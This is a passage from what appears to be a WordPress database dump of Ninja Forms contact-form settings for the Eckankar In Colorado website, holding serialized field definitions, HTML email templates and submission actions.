Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:5:\"order\";s:1:\"6\";}}s:3:\"key\";s:57:\"select_the_person_you_would_like_to_contact_1613167025126\";s:15:\"container_class\";s:8:\"one-half\";s:14:\"drawerDisabled\";b:0;s:11:\"field_label\";s:41:\"Select the person you would like to email\";s:9:\"field_key\";s:14:\"listselect_101\";}s:2:\"id\";i:62;}i:7;a:2:{s:8:\"settings\";a:33:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:8;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:8:\"textarea\";s:5:\"label\";s:23:\"Enter Your Message Here\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"label_pos\";s:5:\"above\";s:13:\"default_value\";s:0:\"\";s:12:\"textarea_rte\";s:1:\"0\";s:14:\"textarea_media\";s:1:\"0\";s:18:\"disable_rte_mobile\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:17:\"calc_auto_include\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:7:\"default\";s:0:\"\";s:3:\"key\";s:12:\"textarea_102\";s:11:\"placeholder\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:10:\"manual_key\";s:0:\"\";s:11:\"field_label\";s:23:\"Enter Your Message Here\";s:9:\"field_key\";s:12:\"textarea_102\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:63;}i:8;a:2:{s:8:\"settings\";a:12:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:9;s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:4:\"HTML\";s:4:\"type\";s:4:\"html\";s:7:\"default\";s:199:\"This site is protected by reCAPTCHA and the Google\n    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and\n    <a href=\"https://policies.google.com/terms\">Terms of Service</a> apply.\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:18:\"html_1663797605970\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";s:3:\"616\";}i:9;a:2:{s:8:\"settings\";a:19:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:10;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:6:\"submit\";s:5:\"label\";s:6:\"Submit\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:16:\"processing_label\";s:10:\"Processing\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:10:\"submit_104\";s:15:\"container_class\";s:0:\"\";s:11:\"field_label\";s:6:\"Submit\";s:9:\"field_key\";s:10:\"submit_104\";}s:2:\"id\";i:65;}}s:7:\"actions\";a:4:{i:0;a:2:{s:8:\"settings\";a:31:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:4:\"save\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2018-01-03 11:43:34\";s:5:\"label\";s:9:\"Save Form\";s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:8:\"reply_to\";s:0:\"\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:19:\"email_message_plain\";s:0:\"\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:15:\"submitter_email\";s:0:\"\";s:18:\"fields-save-toggle\";s:8:\"save_all\";s:16:\"exception_fields\";a:0:{}s:18:\"set_subs_to_expire\";s:1:\"0\";s:16:\"subs_expire_time\";s:2:\"90\";s:11:\"success_msg\";s:42:\"Your form has been successfully submitted.\";}s:2:\"id\";i:21;}i:1;a:2:{s:8:\"settings\";a:28:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2018-01-03 11:43:34\";s:5:\"label\";s:17:\"Send copy to user\";s:12:\"date_updated\";s:10:\"2016-01-15\";s:10:\"attach_csv\";s:1:\"0\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:0:\"\";s:9:\"from_name\";s:20:\"Eckankar In Colorado\";s:12:\"from_address\";s:31:\"webmaster@eckankar-colorado.org\";s:2:\"to\";s:16:\"{field:email_96}\";s:13:\"email_subject\";s:39:\"Boulder Area Initiator and ESA Contacts\";s:13:\"email_message\";s:3757:\"<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<h1>Eckankar In Colorado</h1><br /><br />\r\n</td><br /><br />\r\n<td> </td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p><strong>Hello {field:textbox_94},</strong></p><br /><br />\r\n<p>Thanks for getting in touch! You have created a new form submission on the Eckankar In Colorado website requesting contact with a person on the Boulder Colorado Leadership Communications team.</p><br /><br />\r\n<p>Here is a copy of the information that you have submitted:</p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_94}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_95}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_96}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_97}</span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> {field:listselect_98}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> {field:select_the_person_you_would_like_to_contact_1613167025126}</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>MESSAGE: </strong>{field:textarea_102}</span></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p>Your submission is being forwarded to the person that you have selected and you will be contacted soon.</p><br /><br />\r\n<br /><br />\r\nIf you have any questions regarding the origin of this form, please feel free to contact the<br /><br /><br />\r\n Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br /><br />\r\n<br /><br />\r\n<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<p> </p>\";s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";}s:2:\"id\";i:22;}i:2;a:2:{s:8:\"settings\";a:34:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:14:\"successmessage\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2018-01-03 11:43:34\";s:5:\"label\";s:15:\"Success Message\";s:12:\"date_updated\";s:10:\"2016-01-15\";s:11:\"success_msg\";s:361:\"<div style=\"text-align: center; width: 60%;margin: auto; padding-top: 80px; padding-bottom: 80px\"><span style=\"font-size: 38pt\"><span style=\"color: #23507d\"><strong>Thank You!</strong></span></span><p> <span style=\"font-size: 18pt\">We appreciate you taking the time to communicate with us. You will be contacted soon regarding your submission.</span></p>\n</div>\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:10:\"attach_csv\";s:1:\"0\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:15:\"submitter_email\";s:0:\"\";s:18:\"fields-save-toggle\";s:8:\"save_all\";s:16:\"exception_fields\";a:0:{}s:18:\"set_subs_to_expire\";s:1:\"0\";s:16:\"subs_expire_time\";s:2:\"90\";s:14:\"drawerDisabled\";s:0:\"\";}s:2:\"id\";i:23;}i:3;a:2:{s:8:\"settings\";a:29:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2018-01-03 11:43:34\";s:5:\"label\";s:11:\"Admin Email\";s:12:\"date_updated\";s:10:\"2016-01-19\";s:9:\"from_name\";s:39:\"Boulder Area Initiator and ESA Contacts\";s:12:\"from_address\";s:31:\"webmaster@eckankar-colorado.org\";s:2:\"to\";s:31:\"webmaster@eckankar-colorado.org\";s:13:\"email_subject\";s:43:\"ECK Colorado Website - Form Record Received\";s:13:\"email_message\";s:3516:\"<br><br><br><br><br><br><br><br><br><br><br><br><table id=\"bodyTable\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td valign=\"top\" align=\"center\"><br><br>\n<br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailContainer\" width=\"800\" cellspacing=\"0\" cellpadding=\"10\" border=\"0\">\n<tbody>\n<tr>\n<td valign=\"top\" align=\"left\"><br><br>\n<br><br><br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailHeader\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" valign=\"top\" align=\"left<br ></td><br />\n                                \"><br><br>\n<h1>Eckankar In Colorado</h1><br><br>\n</td>\n<td>&nbsp;</td>\n</tr>\n</tbody>\n</table><br><br>\n</td>\n</tr>\n<tr>\n<td valign=\"top\" align=\"center\"><br><br>\n<br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailBody\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\" border=\"0\">\n<tbody>\n<tr>\n<td valign=\"top\" align=\"left\"><br><br>\n<p><strong>Hello! You have a new <span style=\"color: #23507d\">Boulder Initiators and ESAs</span> form submission.<br><br><br>\n </strong><br><br><br>\n This form was generated from a user submission on the <em>Eckankar In Colorado</em> website. You are receiving this submission because you are listed as a contact for the <em>Boulder Colorado Leadership Organization</em>.<br><br><br>\n <strong><br><br><br>\n The following person has requested contact with an ECK representative. Here is the information that <span style=\"color: #666666\">{field:textbox_94} {field:lastname_95}</span> has submitted:</strong></p><br><br>\n</td>\n</tr>\n</tbody>\n</table><br><br>\n<br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailHeader\" width=\"100%\" cellspacing=\"0\" cellpadding=\"20\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" valign=\"top\" align=\"left<br ></td><br />\n                                \"><br><br>\n<p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_94}<br><br><br>\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_95}<br><br><br>\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_96}<br><br><br>\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_97}</span><br><br><br>\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> {field:listselect_98}<br><br><br>\n </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> {field:select_the_person_you_would_like_to_contact_1613167025126}</span></p><br><br>\n<p><span style=\"color: #333333\"><strong>MESSAGE: </strong>{field:textarea_102}</span></p><br><br>\n</td>\n</tr>\n</tbody>\n</table><br><br>\n</td>\n</tr>\n<tr>\n<td valign=\"top\" align=\"center\"><br><br>\n<br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailFooter\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\" border=\"0\">\n<tbody>\n<tr>\n<td valign=\"top\" align=\"left\">If you have any questions regarding the origin of this form, please feel free to contact the Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br><br>\n<br><br>\n<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br><br><br>\n <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br><br>\n</td>\n</tr>\n</tbody>\n</table><br><br>\n</td>\n</tr>\n</tbody>\n</table><br><br>\n</td>\n</tr>\n</tbody>\n</table><br><br>\n<p>&nbsp;</p>\";s:10:\"attach_csv\";s:1:\"0\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:0:\"\";s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:14:\"drawerDisabled\";s:0:\"\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";}s:2:\"id\";i:24;}}s:8:\"settings\";a:41:{s:10:\"objectType\";s:12:\"Form Setting\";s:10:\"editActive\";b:1;s:5:\"title\";s:31:\"Boulder Area Initiator and ESAs\";s:10:\"created_at\";s:19:\"2019-07-15 14:04:43\";s:10:\"form_title\";s:32:\"Boulder Area Initiator and ESA\'s\";s:17:\"default_label_pos\";s:5:\"above\";s:10:\"show_title\";s:1:\"0\";s:14:\"clear_complete\";s:1:\"1\";s:13:\"hide_complete\";s:1:\"1\";s:9:\"logged_in\";s:1:\"0\";s:12:\"date_updated\";s:19:\"2017-07-04 16:58:32\";s:6:\"status\";s:0:\"\";s:11:\"append_page\";s:0:\"\";s:4:\"ajax\";s:1:\"0\";s:17:\"not_logged_in_msg\";s:0:\"\";s:16:\"sub_limit_number\";s:0:\"\";s:13:\"sub_limit_msg\";s:0:\"\";s:8:\"last_sub\";s:1:\"1\";s:10:\"conditions\";a:0:{}s:13:\"wrapper_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:0:\"\";s:10:\"add_submit\";s:1:\"1\";s:8:\"currency\";s:0:\"\";s:18:\"unique_field_error\";s:50:\"A form with this value has already been submitted.\";s:12:\"calculations\";a:0:{}s:15:\"formContentData\";a:10:{i:0;s:7:\"html_93\";i:1;s:10:\"textbox_94\";i:2;s:11:\"lastname_95\";i:3;s:8:\"email_96\";i:4;s:8:\"phone_97\";i:5;s:13:\"listselect_98\";i:6;s:57:\"select_the_person_you_would_like_to_contact_1613167025126\";i:7;s:12:\"textarea_102\";i:8;s:18:\"html_1663797605970\";i:9;s:10:\"submit_104\";}s:17:\"allow_public_link\";i:0;s:10:\"embed_form\";s:0:\"\";s:19:\"changeEmailErrorMsg\";s:0:\"\";s:18:\"changeDateErrorMsg\";s:0:\"\";s:20:\"confirmFieldErrorMsg\";s:0:\"\";s:22:\"fieldNumberNumMinError\";s:0:\"\";s:22:\"fieldNumberNumMaxError\";s:0:\"\";s:22:\"fieldNumberIncrementBy\";s:0:\"\";s:23:\"formErrorsCorrectErrors\";s:0:\"\";s:21:\"validateRequiredField\";s:0:\"\";s:21:\"honeypotHoneypotError\";s:0:\"\";s:20:\"fieldsMarkedRequired\";s:0:\"\";s:20:\"repeatable_fieldsets\";s:0:\"\";s:14:\"drawerDisabled\";b:0;}s:14:\"deleted_fields\";a:0:{}s:15:\"deleted_actions\";a:0:{}}',4,0x00),(8,'a:7:{s:2:\"id\";i:8;s:20:\"show_publish_options\";b:0;s:6:\"fields\";a:12:{i:0;a:2:{s:8:\"settings\";a:20:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:1;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:4:\"html\";s:5:\"label\";s:4:\"Text\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:13:\"default_value\";s:231:\"<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Central Colorado /Â ECK Temple in Colorado Leadership Communications</span></span></span></strong></span></h3>\r\n\";s:7:\"desc_el\";s:3:\"div\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:7:\"default\";s:227:\"<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Central Colorado / ECK Temple in Colorado Leadership Communications</span></span></span></strong></span></h3>\n\";s:3:\"key\";s:7:\"html_20\";s:15:\"container_class\";s:0:\"\";s:11:\"field_label\";s:4:\"Text\";s:9:\"field_key\";s:7:\"html_20\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";i:66;}i:1;a:2:{s:8:\"settings\";a:52:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:2;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:7:\"textbox\";s:6:\"def_id\";s:1:\"6\";s:5:\"label\";s:10:\"First Name\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:0:\"\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"1\";s:9:\"last_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:14:\"user_address_1\";s:0:\"\";s:14:\"user_address_2\";s:0:\"\";s:9:\"user_city\";s:0:\"\";s:8:\"user_zip\";s:0:\"\";s:10:\"user_phone\";s:0:\"\";s:10:\"user_email\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:10:\"textbox_21\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:14:\"one-half first\";s:10:\"manual_key\";s:0:\"\";s:11:\"custom_mask\";s:0:\"\";s:11:\"field_label\";s:10:\"First Name\";s:9:\"field_key\";s:10:\"textbox_21\";s:21:\"custom_name_attribute\";s:0:\"\";s:23:\"personally_identifiable\";s:0:\"\";s:5:\"value\";s:0:\"\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";i:67;}i:2;a:2:{s:8:\"settings\";a:48:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:3;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:8:\"lastname\";s:6:\"def_id\";s:1:\"7\";s:5:\"label\";s:9:\"Last Name\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:0:\"\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:14:\"user_address_1\";s:0:\"\";s:14:\"user_address_2\";s:0:\"\";s:9:\"user_city\";s:0:\"\";s:8:\"user_zip\";s:0:\"\";s:10:\"user_phone\";s:0:\"\";s:10:\"user_email\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:11:\"lastname_22\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:8:\"one-half\";s:11:\"field_label\";s:9:\"Last 